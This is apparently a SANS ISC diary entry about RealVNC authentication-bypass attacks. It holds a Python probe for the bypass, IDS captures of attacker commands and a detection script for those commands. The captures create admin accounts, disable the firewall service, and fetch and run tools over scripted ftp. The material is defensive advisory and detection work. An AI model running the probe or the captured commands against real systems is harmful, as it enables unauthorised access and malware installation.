SANS ISC: InfoSec Handlers Diary Blog

RealVNC exploits in the wild

Published: 2006-05-19
Last Updated: 2006-05-19 10:35:46 UTC
by Swa Frantzen (Version: 3)
Readers are reporting active use of RealVNC to break into systems.

If you can share more details, or can just report attempts, please let us know.

If you have any RealVNC server exposed, check whether it has already been compromised; if it has not, upgrade it to a fixed release or take it off the network immediately. If you want an inherently more secure setup, look up how to run VNC over SSH on your specific platform (bind the VNC server to localhost and reach it through an SSH port forward), so that the VNC port itself is never reachable from the network.

See the May 15th diary by Kyle Haugsness for the details of the vulnerability.
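As an added example (not code from the diary or from RealVNC), here is a small probe for the authentication bypass that the May 15th diary describes, which I reference here by its CVE number, CVE-2006-2369. In the RFB 3.8 handshake the server lists the security types it offers, the client names one, and for type 1 (None) the server answers with a 4-byte SecurityResult; a RealVNC 4.1.1 server honours type 1 even when it offered only type 2 (VNC authentication). The probe always asks for None and reports what the server offered and whether it accepted. The `FakeRfbServer` class is a constructed in-memory stand-in so the handshake logic can be exercised offline; `probe_host()` is the same logic over a real TCP connection. Only probe servers you are authorised to test.

```python
# Added example, not from the diary: probe for the RealVNC 4.1.1 authentication
# bypass (CVE-2006-2369) referenced above. In RFB 3.8 the server lists the
# security types it offers, the client names one, and for type 1 (None) the
# server answers with a 4-byte SecurityResult. A vulnerable server honours
# type 1 even when it offered only type 2 (VNC authentication). FakeRfbServer
# is an in-memory stand-in so the probe runs offline; probe_host() talks to a
# real listener. Only probe servers you are authorised to test.
import socket
import struct

RFB_38 = b"RFB 003.008\n"
SEC_NONE, SEC_VNCAUTH = 1, 2

def _recv_exact(conn, n):
    """Read exactly n bytes from conn (a socket or a stand-in) or raise EOFError."""
    buf = b""
    while len(buf) < n:
        chunk = conn.recv(n - len(buf))
        if not chunk:
            raise EOFError("connection closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf

def probe_none_auth(conn):
    """Run the RFB 3.8 handshake over conn, always choosing security type None.

    Returns (offered_types, none_accepted). Only RFB 3.8 (what RealVNC 4.x
    speaks) is handled; the None type has no SecurityResult in 3.3 and 3.7.
    """
    version = _recv_exact(conn, 12)                 # the server speaks first
    if version != RFB_38:
        raise NotImplementedError("probe only speaks RFB 3.8, server sent %r" % version)
    conn.sendall(RFB_38)
    count = _recv_exact(conn, 1)[0]
    if count == 0:                                  # handshake refused, reason follows
        reason_len = struct.unpack(">I", _recv_exact(conn, 4))[0]
        raise ConnectionError(_recv_exact(conn, reason_len).decode("latin-1", "replace"))
    offered = list(_recv_exact(conn, count))
    conn.sendall(bytes([SEC_NONE]))                 # ask for None, offered or not
    try:
        result = struct.unpack(">I", _recv_exact(conn, 4))[0]
    except (EOFError, OSError):                     # a fixed server may just drop us
        return offered, False
    return offered, result == 0                     # SecurityResult 0 means OK

def is_auth_bypass(offered, none_accepted):
    """True when None was accepted although the server never offered it."""
    return none_accepted and SEC_NONE not in offered

def probe_host(host, port=5900, timeout=5.0):
    """Probe a live server: returns (offered_types, none_accepted)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return probe_none_auth(s)

class FakeRfbServer:
    """Minimal in-memory RFB 3.8 server for testing the probe offline.

    vulnerable=True mimics RealVNC 4.1.1 (any client choice is honoured);
    vulnerable=False mimics a fixed server, which fails a type it did not offer.
    """
    def __init__(self, vulnerable, offered=(SEC_VNCAUTH,)):
        self.vulnerable, self.offered = vulnerable, tuple(offered)
        self.inbuf, self.outbuf = b"", RFB_38      # server version goes out first
        self.stage = "version"

    def sendall(self, data):                       # client -> server
        self.inbuf += data
        self._step()

    def recv(self, n):                             # server -> client, b"" once drained
        chunk, self.outbuf = self.outbuf[:n], self.outbuf[n:]
        return chunk

    def _step(self):
        if self.stage == "version" and len(self.inbuf) >= 12:
            self.inbuf = self.inbuf[12:]
            self.outbuf += bytes([len(self.offered)]) + bytes(self.offered)
            self.stage = "sectype"
        elif self.stage == "sectype" and self.inbuf:
            choice, self.inbuf, self.stage = self.inbuf[0], self.inbuf[1:], "done"
            if choice == SEC_NONE and (self.vulnerable or SEC_NONE in self.offered):
                self.outbuf += struct.pack(">I", 0)               # SecurityResult OK
            elif choice in self.offered:
                self.outbuf += b"\x00" * 16                       # VNC auth challenge
            else:
                reason = b"unknown security type"
                self.outbuf += struct.pack(">II", 1, len(reason)) + reason

if __name__ == "__main__":
    for label, vuln in (("RealVNC 4.1.1-like", True), ("fixed", False)):
        offered, ok = probe_none_auth(FakeRfbServer(vulnerable=vuln))
        print("%-18s offered %s  None accepted: %s  bypass: %s"
              % (label, offered, ok, is_auth_bypass(offered, ok)))
```

Note the distinction `is_auth_bypass()` draws: a server that offers type 1 itself is simply running without authentication, which is a configuration problem rather than this bug; the bypass is when None is accepted without ever having been offered. A fixed server may answer with a failed SecurityResult or just close the connection, so both are treated as "not accepted".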

[updates below]
List of exploits reported to us by our readers:
  • Austin from the UK reports that all shared printers in his office started to print:
Dear Network Administrator. 

Please do not be alarmed.
My team is network security specialist.

You are using a vulnerable version of VNC.
Please upgrade your version soon.

We have not accessed your data but we could have.
Have a nice day

The intrusion reportedly happened on a workstation where a visitor left a VNC server running.

He notes that "RealVNC logs all connection IP addresses in the event manager which some people didn't know".
  • An anonymous report of the installation of tools typical of the warez and hacker crowd, such as Serv-U and pwdump.

  • Mike reported a machine being hacked and sent us what his IDS captured:
    net user [user] [pass] /ADD
    net localgroup Administrators [user] /ADD
    net stop sharedaccess
    sc delete sharedaccess
    echo open [IP] [port]  > ftptmp
    echo user [ftpuserinfo] >> ftptmp
    echo get usercontrol.exe  >> ftptmp
    echo get helpservice.svc  >> ftptmp
    echo get JAcheck.ini  >> ftptmp
    echo get JAcheck.dll  >> ftptmp
    echo bye  >> ftptmp
    ftp -n -s:ftptmp
    del ftptmp
    usercontrol /i
    net start "ms system service"
Analysis by fellow handler Scott indicated that it adds a user with admin rights, and installs what looks like Serv-U on the machine. The capture also shows the sharedaccess service (Windows Firewall / Internet Connection Sharing) being stopped and deleted before the tools are fetched with a scripted ftp session, the script itself being built with echo redirects and deleted afterwards. Perhaps more happened earlier, happens later, or just was not caught.
  • An anonymous user reports: "We have been using RealVNC 4.1.1 and have been experiencing successful unauthorized connections to our machines. Also, we have seen increased traffic on our network which looks like scanning, some network printers have also been printing pages of gibberish." He concluded with "We are currently upgrading all VNC servers to 4.1.2."

  • Another anonymously reported attack, seen on port 5900 (also an IDS capture); the RealVNC angle is only an assumption at this point:
    cd %WINDIR%\system32
    echo open [IP] [PORT] >>ms32
    echo [user] >>ms32
    echo [pass] >>ms32
    echo get pack.exe>>ms32
    echo get Iass.exe>>ms32
    echo get mssd.ini>>ms32
    echo get fport.exe>>ms32
    echo get op.exe>>ms32
    echo get pskill.exe>>ms32
    echo bye>>ms32
    ftp -v -s:ms32
    Iass.exe /I
    net start dnsd
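The two captures above share a shape: an ftp script assembled with echo redirects and fed to `ftp -s:`, a file that script fetched being executed, and a service being started right after it. As an added example (not code from the diary), here is detection logic that flags those steps, plus the account creation and the stop/delete of the sharedaccess service from Mike's capture, when run over a per-host log of executed commands. The rule names are my own; the two sample sessions are the diary's captures with the redacted `[IP]`, `[user]` and `[pass]` placeholders left as they appear.

```python
# Added example, not from the diary: flag the attack pattern seen in the two IDS
# captures above. The sample sessions are the diary's captures, placeholders kept.
import re
from collections import defaultdict

SESSION_MIKE = r"""net user [user] [pass] /ADD
net localgroup Administrators [user] /ADD
net stop sharedaccess
sc delete sharedaccess
echo open [IP] [port]  > ftptmp
echo user [ftpuserinfo] >> ftptmp
echo get usercontrol.exe  >> ftptmp
echo get helpservice.svc  >> ftptmp
echo get JAcheck.ini  >> ftptmp
echo get JAcheck.dll  >> ftptmp
echo bye  >> ftptmp
ftp -n -s:ftptmp
del ftptmp
usercontrol /i
net start "ms system service"
"""
SESSION_ANON = r"""cd %WINDIR%\system32
echo open [IP] [PORT] >>ms32
echo [user] >>ms32
echo [pass] >>ms32
echo get pack.exe>>ms32
echo get Iass.exe>>ms32
echo get mssd.ini>>ms32
echo get fport.exe>>ms32
echo get op.exe>>ms32
echo get pskill.exe>>ms32
echo bye>>ms32
ftp -v -s:ms32
Iass.exe /I
net start dnsd
"""

ECHO_REDIRECT = re.compile(r"^echo\s+(?P<body>.*?)\s*>>?\s*(?P<file>\S+)$", re.I)
FTP_SCRIPT = re.compile(r"^ftp\b.*?-s:(?P<file>\S+)", re.I)
NET_START = re.compile(r"^net\s+start\s+(?P<svc>.+?)$", re.I)
# One-line rules: (rule name, pattern whose group 1 is reported as the detail).
# sharedaccess is the Windows Firewall / Internet Connection Sharing service.
SIMPLE_RULES = [
    ("local_account_created", re.compile(r"^net\s+user\s+(\S+)\s+\S+\s+/add\b", re.I)),
    ("account_added_to_administrators", re.compile(r"^net\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)),
    ("sharedaccess_service_disabled", re.compile(r"^((?:net\s+stop|sc\s+delete)\s+sharedaccess)\b", re.I)),
]

def _stem(token):
    """'C:\\x\\Iass.exe' -> 'iass'; 'usercontrol' -> 'usercontrol'."""
    return token.rsplit("\\", 1)[-1].rsplit(".", 1)[0].lower()

def _simple_rule(line):
    """First one-line rule matching `line`, as (rule, detail), else None."""
    hits = [(rule, m.group(1)) for rule, rx in SIMPLE_RULES for m in [rx.match(line)] if m]
    return hits[0] if hits else None

def analyze_session(text):
    """Return [(rule, line_no, detail), ...] for one host's command sequence."""
    staged = defaultdict(list)   # ftp script file -> commands echoed into it
    fetched = set()              # stems of files a staged ftp script downloaded
    dropper_ran = False
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        m = ECHO_REDIRECT.match(line)
        if m:                                      # script being assembled with echo
            staged[m.group("file").lower()].append(m.group("body"))
            continue
        m = FTP_SCRIPT.match(line)
        if m and m.group("file").lower() in staged:  # ftp -s: fed the staged script
            script = m.group("file").lower()
            gets = [c[4:].strip() for c in staged[script] if c.lower().startswith("get ")]
            fetched.update(_stem(g) for g in gets)
            findings.append(("ftp_script_built_with_echo", no, "%s fetches %s" % (script, ", ".join(gets))))
            continue
        hit = _simple_rule(line)
        if hit:
            findings.append((hit[0], no, hit[1]))
            continue
        m = NET_START.match(line)
        if m:                                      # new service right after a dropper ran
            if dropper_ran:
                findings.append(("service_started_after_dropper", no, m.group("svc").strip('"')))
            continue
        if _stem(line.split()[0]) in fetched:      # a downloaded file being executed
            dropper_ran = True
            findings.append(("downloaded_file_executed", no, line))
    return findings

if __name__ == "__main__":
    for name, session in (("Mike", SESSION_MIKE), ("port 5900", SESSION_ANON)):
        for rule, no, detail in analyze_session(session):
            print("%-9s line %2d  %-34s %s" % (name, no, rule, detail))
```

The stateful rules are the useful part: `ftp -s:` against a file that the same session just wrote with echo, and a later command whose first token is a file that script pulled down, are far more specific than any of the individual commands, each of which an administrator might type legitimately. The `net start` rule fires only once a fetched file has been executed, for the same reason.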

It sure looks like these machines are slowly getting owned one by one ...

Swa Frantzen -- Section 66